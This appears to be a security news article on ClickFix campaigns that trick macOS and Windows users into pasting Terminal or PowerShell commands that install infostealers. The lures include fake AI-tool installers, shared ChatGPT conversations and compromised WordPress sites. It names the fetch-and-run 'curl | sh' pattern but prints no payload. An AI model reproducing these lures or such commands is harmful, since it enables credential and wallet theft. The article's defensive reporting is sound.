Cybersecurity researchers have identified multiple ClickFix malware campaigns distributing a macOS information stealing malware known as MacSync. The campaigns rely heavily on social engineering techniques that trick users into manually executing malicious commands in the macOS Terminal.
Security experts from Sophos explained that the attacks differ from traditional exploit driven campaigns. Instead of exploiting software vulnerabilities, the attackers depend on user interaction, typically persuading victims to copy and paste obfuscated commands into the Terminal application.
This method is particularly dangerous because many users do not fully understand the risks associated with executing unfamiliar command line instructions.
Multiple Campaigns Identified Since Late 2025
Researchers have documented three separate campaigns spreading MacSync malware between November 2025 and February 2026. It is not yet confirmed whether the same threat actor is responsible for all of them.
The first campaign appeared in November 2025 and used a fake version of the OpenAI Atlas browser as bait. Sponsored advertisements on Google redirected users to a malicious Google Sites page containing a download button. Clicking the button displayed instructions telling users to open the Terminal application and run a command.
Once executed, the command downloaded a shell script that requested the system password and installed the MacSync malware with standard user level privileges.
Malvertising Campaign Leveraged ChatGPT Conversations
A second campaign was observed in December 2025 and relied on malicious search engine advertising. Attackers targeted users searching for phrases such as “how to clean up your Mac.”
Victims were directed to shared conversations on the legitimate ChatGPT website, making the links appear trustworthy. These conversations contained links that redirected users to fake GitHub styled pages designed to convince them to run malicious commands inside the Terminal application.
New MacSync Variant Targets Global Users
In February 2026, researchers discovered a third campaign targeting users in Belgium, India, and several regions across North and South America. This operation distributed a more advanced version of the MacSync infostealer using ClickFix tactics.
The latest variant introduces several technical improvements, including:
- Support for dynamic AppleScript payloads
- In memory execution to avoid detection
- Enhanced evasion techniques against security analysis
After execution, the shell script contacts a hard coded command server to download the AppleScript based infostealer payload. At the same time, it attempts to remove traces of its activity to conceal the data theft.
The malware is capable of stealing various types of sensitive information, including login credentials, files, keychain databases, and cryptocurrency wallet seed phrases.
ClickFix Attacks Exploit Trust in AI Platforms
Researchers believe attackers are adapting their tactics to bypass modern security protections. One strategy involves exploiting the trust users place in AI platforms such as ChatGPT.
By embedding malicious instructions within seemingly legitimate discussions or tutorials, attackers can trick users into executing commands that install malware on their systems.
InstallFix and GoogleFix Variants Expanding the Threat
Security researchers have also observed related social engineering attacks known as InstallFix or GoogleFix. These campaigns host fake installation guides for developer tools on legitimate platforms such as:
- Cloudflare Pages
- Squarespace
- Tencent EdgeOne
The malicious instructions often claim to install developer tools like Anthropic Claude Code, but instead deliver malware such as Amatera Stealer.
In some cases, similar attack chains deploy Alien infostealer on Windows systems or Atomic Stealer on macOS devices.
Developer Installation Patterns Help Hide Malware
One reason these attacks succeed is that developers frequently install software using command line instructions such as curl | sh, which downloads and executes scripts automatically.
Many legitimate tools, including Homebrew, Rust, and Node Version Manager (nvm), use this installation pattern. Attackers take advantage of this familiarity, hiding malicious commands within what appears to be normal installation instructions.
ClickFix Tactics Spread Across Multiple Malware Campaigns
The ClickFix technique has quickly become popular among cybercriminal groups. One example is a malicious traffic distribution system called KongTuke, also known by several aliases including 404 TDS, Chaya_002, LandUpdate808, and TAG-124.
This infrastructure uses compromised WordPress websites and fake CAPTCHA pages to distribute malware such as ModeloRAT, a Python based remote access trojan.
In these attacks, malicious JavaScript embedded in legitimate websites instructs visitors to run a PowerShell command, which begins a multi stage infection process.
WordPress Sites Weaponized in Global Campaign
A recent investigation by Rapid7 revealed that more than 250 compromised WordPress websites across 12 countries are being used in a large scale ClickFix campaign.
Affected countries include:
Australia, Brazil, Canada, Czechia, Germany, India, Israel, Singapore, Slovakia, Switzerland, the United Kingdom, and the United States.
Many of the infected websites belong to regional news outlets and local businesses, making the malicious pages appear trustworthy.
The campaign ultimately installs various data stealing malware families on Windows systems, including:
- StealC Stealer
- Vidar based stealers
- Impure Stealer
- VodkaStealer
Stolen data can then be used for financial fraud or further cyber attacks.
Protecting Against ClickFix Attacks
Security experts recommend that website administrators and users take proactive steps to reduce risk.
For website administrators, key defensive measures include:
- Keeping WordPress plugins and themes updated
- Using strong administrator passwords
- Enabling two factor authentication
- Monitoring for unauthorized administrator accounts
For individual users, experts advise maintaining a cautious browsing mindset and avoiding the execution of unknown Terminal or PowerShell commands.
Researchers emphasize that even legitimate websites can become compromised and used as distribution points for malware.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
